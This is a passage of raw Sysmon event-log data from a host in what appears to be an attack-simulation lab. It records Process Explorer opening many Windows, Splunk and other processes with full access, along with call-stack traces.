Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000785534Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.456{732C744F-3227-6010-BFA2-00000000A301}7500C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{732C744F-1518-600B-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000785533Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.299{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31B8-6010-AFA2-00000000A301}6088C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785532Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785531Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785530Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785529Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785528Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785527Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785526Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785525Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785524Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785523Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785522Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785521Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785520Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785519Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785518Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785517Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785516Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785515Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785514Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785513Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785512Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785511Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785510Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785509Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785508Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785507Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785506Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785505Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785504Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785503Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785502Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785501Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785500Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785499Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:51.284{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785498Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 